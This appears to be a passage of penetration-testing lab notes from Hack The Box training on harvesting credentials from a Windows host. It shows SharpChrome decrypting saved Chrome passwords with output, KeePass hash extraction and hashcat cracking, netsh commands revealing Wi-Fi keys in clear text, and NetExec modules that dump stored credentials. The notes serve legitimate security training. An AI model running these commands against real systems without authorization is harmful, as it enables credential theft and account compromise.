PS C:\htb> .\SharpChrome.exe logins /unprotect

  __                 _
 (_  |_   _. ._ ._  /  |_  ._ _  ._ _   _
 __) | | (_| |  |_) \_ | | | (_) | | | (/_
                |
  v1.7.0


[*] Action: Chrome Saved Logins Triage

[*] Triaging Chrome Logins for current user



[*] AES state key file : C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key      : 5A2BF178278C85E70F63C4CC6593C24D61C9E2D38683146F6201B32D5B767CA0


--- Chrome Credential (Path: C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---

file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://vc01.inlanefreight.local/,https://vc01.inlanefreight.local/ui,4/12/2021 5:16:52 PM,13262735812597100,bob@inlanefreight.local,Welcome1
```

### **Dictionary Files**

```powershell-session
PS C:\htb> gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

Password1234!
```

## Browsers - All

{% embed url="<https://github.com/moonD4rk/HackBrowserData?s=03>" %}

## Keepass databases kdbx

{% embed url="<https://0xdf.gitlab.io/2022/04/14/htb-jeeves.html>" %}

<figure><img src="/files/qko5LTXY3m34rrNBssK8" alt=""><figcaption></figcaption></figure>

```
[Apr 25, 2024 - 03:07:05 (EDT)] exegol-CPTS /workspace # keepass2john Logins.kdbx 
Logins:$keepass$*2*60000*0*048f742ba4e83db43180a31b429023defcb09a2e4110956e218a498c90bfc39a*2f3c5560d95ead326c79f32988cbab81bafcabbd4cd69cd237a1d2fbadd7fb84*1eef873a28851d1fcd946d2b24bd29f6*d68c6859ae565c09ddc5b81c39d87565cc8c50338a3fb9e6e0a3425e55b0b7a3*35683df41573246ad58a3fdad9a764d7b5d4e3610e1a021be2f2f1018523c065
[Apr 25, 2024 - 03:12:31 (EDT)] exegol-CPTS /workspace # keepass2john Logins.kdbx > Logins.hash
[Apr 25, 2024 - 03:12:38 (EDT)] exegol-CPTS /workspace # hashcat Logins.hash /usr/share/wordlists/rockyou.txt --user
```

<figure><img src="/files/O6ZBmnPVAleLR0K4ONex" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/YndWM1KJAd9eCeOLO5Hc" alt=""><figcaption></figcaption></figure>

```
hashcat Logins.hash /usr/share/wordlists/rockyou.txt --user -m 13400
```

## Email

{% embed url="<https://github.com/dafthack/MailSniper>" %}

## Wifi

If we obtain **local admin access** to a user's workstation with a wireless card, we can list out any wireless networks they have recently connected to.

```cmd-session
C:\htb> netsh wlan show profile

Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Smith Cabin
    All User Profile     : Bob's iPhone
    All User Profile     : EE_Guest
    All User Profile     : EE_Guest 2.4
    All User Profile     : ilfreight_corp
```

```cmd-session
C:\htb> netsh wlan show profile ilfreight_corp key=clear
```

{% embed url="<https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-wifi-password>" %}

***

## CME - Interesting SMB modules

{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}

`[*] winscp Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.`

`[*] iis Checks for credentials in IIS Application Pool configuration files using appcmd.exe`

`[*] rdcman Remotely dump Remote Desktop Connection Manager (sysinternals) credentials`


